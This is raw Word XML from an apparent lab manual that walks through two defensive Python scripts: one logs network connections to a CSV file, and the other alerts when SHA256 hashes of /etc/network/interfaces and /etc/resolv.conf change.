      </w:pPr>
    </w:p>
    <w:p w14:paraId="459BE79D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74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rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>network_logger.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09115625" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="74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script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79227053" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="18"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="393C2AC5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network_logger.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5441A2E7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751361DD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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script will continuously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network connections and save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them </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-5"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>to</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039E5559" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="10"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>network_connections.csv</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3CE6C2" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="45"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="776D9FDA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439A664E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="15539EC6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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CSV file</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>in Excel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text </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43FEBCA4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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data based on process</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-1"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>names, statuses, or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addresses.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E97A796" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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unusual or suspicious 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activity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B04EE53" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="7"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4737AEE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="1"/>
      </w:pPr>
      <w:r>
        <w:t>Step 5: Stopping the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3E3DE26F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6724823B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="284" w:lineRule="exact"/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Ctrl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to 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script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EA4FD54" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="72"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1079"/>
        </w:tabs>
        <w:spacing w:line="284" w:lineRule="exact"/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network_connections.csv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logged.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A976EF0" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="275"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3E87A48F" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:t>◻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incoming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outgoing</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-9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and saves them for further analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C0E4B4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12B6AB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ind w:right="435"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/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unauthorized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network configuration files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/network/interfaces</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:b/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/resolv.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13F6798B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="2"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71A17E8B" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:line="274" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t>Aim:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B808B69" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="247" w:lineRule="auto"/>
        <w:ind w:left="36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Python-based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detects</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4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network configuration files (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/network/interfaces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/etc/resolv.conf</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D713127" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="266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2A77A898" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4B8B99C6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4597108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9" w:line="279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hashlib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rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>time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(pre-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>installed)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F60FAF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71" w:lineRule="exact"/>
        <w:ind w:left="1080"/>
        <w:rPr>
          <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pP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(Administrator/Root</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>privileges</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> required)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688578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z w:val="24"/>
        </w:rPr>
        <w:t>Nano,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etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4792BDAB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="10"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63832AFA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3A149B34" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="8"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4392E053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1: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Understanding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the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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Concept</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B4A019" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="52"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="506ED804" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360" w:right="426"/>
      </w:pPr>
      <w:r>
        <w:t>System network configuration files are critical for defining network interfaces and DNS settings. Any</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-8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vulnerabilities.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 develops a monitoring tool that computes hash values of target files and alerts the user if any modifications are detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4761F1E3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1389628A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2: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Implementing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the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Monitoring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Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18961024" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF5FDE8" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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network_monitor.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B1A9C67" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="71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spacing w:val="-4"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36EEDD35" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04A9002A" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="360" w:right="8395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hashlib import time import os</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="627810CA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332904CD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List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monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47AA0A22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FILES_TO_MONITOR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["/etc/network/interfaces",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pacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"/etc/resolv.conf"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61539623" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5EB3AA1C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1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get_file_hash(filepath):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D91D581" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="242" w:lineRule="auto"/>
        <w:ind w:left="840" w:right="3449"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"""Returns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SHA256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contents.""" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>try:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EB88DD4" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="1800" w:right="4861" w:hanging="48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open(filepath,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'rb')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file: file_contents = file.read()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1925E14C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="840" w:right="2222" w:firstLine="959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hashlib.sha256(file_contents).hexdigest() except FileNotFoundError:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D40EDEF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr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4"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>None</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EF4D50D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="22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monitor_files(interval=10):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="319E046D" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="840" w:right="783"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>"""Continuously monitors the files for unauthorized changes.""" file_hashes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{file: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get_file_hash(file)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FILES_TO_MONITOR}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161CA5FD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="226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print("Monitoring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started.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Press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Ctrl+C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stop.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64188CF6" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1CE4A019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 w14:paraId="09DE93AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:line="226" w:lineRule="exact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True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD467AF" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="180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time.sleep(interval)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019A6684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5B8370" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="83"/>
        <w:ind w:left="2280" w:right="4377" w:hanging="404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for file in FILES_TO_MONITOR: new_hash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get_file_hash(file) if new_hash is None:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CE1CFB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="2"/>
        <w:ind w:left="2280" w:right="2222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print(f"[ALERT]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{file}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deleted!") elif new_hash != file_hashes[file]:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3A9E7E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="2760"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>print(f"[WARNING]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Unauthorized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change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detected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{file}!") file_hashes[file] = new_hash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 Update stored hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DF06AD" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="132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except KeyboardInterrupt: print("Monitoring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stopped.")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0FF434" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="225"/>
        <w:ind w:left="840" w:right="5720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 xml:space="preserve"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 xml:space="preserve">": </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>monitor_files()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B18267C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="195"/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3: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Running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the</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:color w:val="4F81BC"/>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t xml:space="preserve"> Script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48895AB5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="65"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5869AEAA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70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rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>network_monitor.py</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="695E9296" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="70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Grant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necessary):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C2A74BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="17"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33CD2DE2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chmod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+x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network_monitor.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61660BFE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22E707C3" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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script </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>using:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14217A51" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="15"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="635E2AEC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python3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network_monitor.py</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA19419" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="50"/>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07BB604C" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="1"/>
        <w:ind w:left="1080"/>
      </w:pPr>
      <w:r>
        <w:t>(Use</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-4"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New"/>
          <w:spacing w:val="-60"/>
          <w:sz w:val="2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Linux/macOS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rPr>
          <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>permissions.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A69F596" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="4"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0DFF5B41" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="1"/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4: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Testing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Unauthorized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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Changes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="185C8556" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="59"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3073FAFA" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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0"/>
        </w:rPr>
        <w:t>/etc/resolv.conf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rFonts w:ascii="Courier New"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>/etc/network/interfaces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editor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C700E47" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="55"/>
        <w:rPr>
          <w:sz w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="21E0A23F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nano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/etc/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41BD0674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0BAD797E" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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and save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91A9916" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6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tool‟s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terminal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6FB151" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="13"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="53F23F79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5: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Stopping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the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  <w:spacing w:val="-2"/>
        </w:rPr>
        <w:t>Monitor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F79F700" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="62"/>
        <w:rPr>
          <w:rFonts w:ascii="Cambria"/>
          <w:b/>
          <w:sz w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="55058002" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68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Ctrl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to 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script.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0CB1BB" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="68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detected </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-2"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="350B2714" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00A16F47">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:spacing w:before="9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07E7036F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447B72A5" w14:textId="77777777" w:rsidR="00A16F47" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:t>◻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continuously</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:spacing w:val="-11"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>monitors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 unauthorized modifications are detected.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EE9FC0E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77964F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773"/>
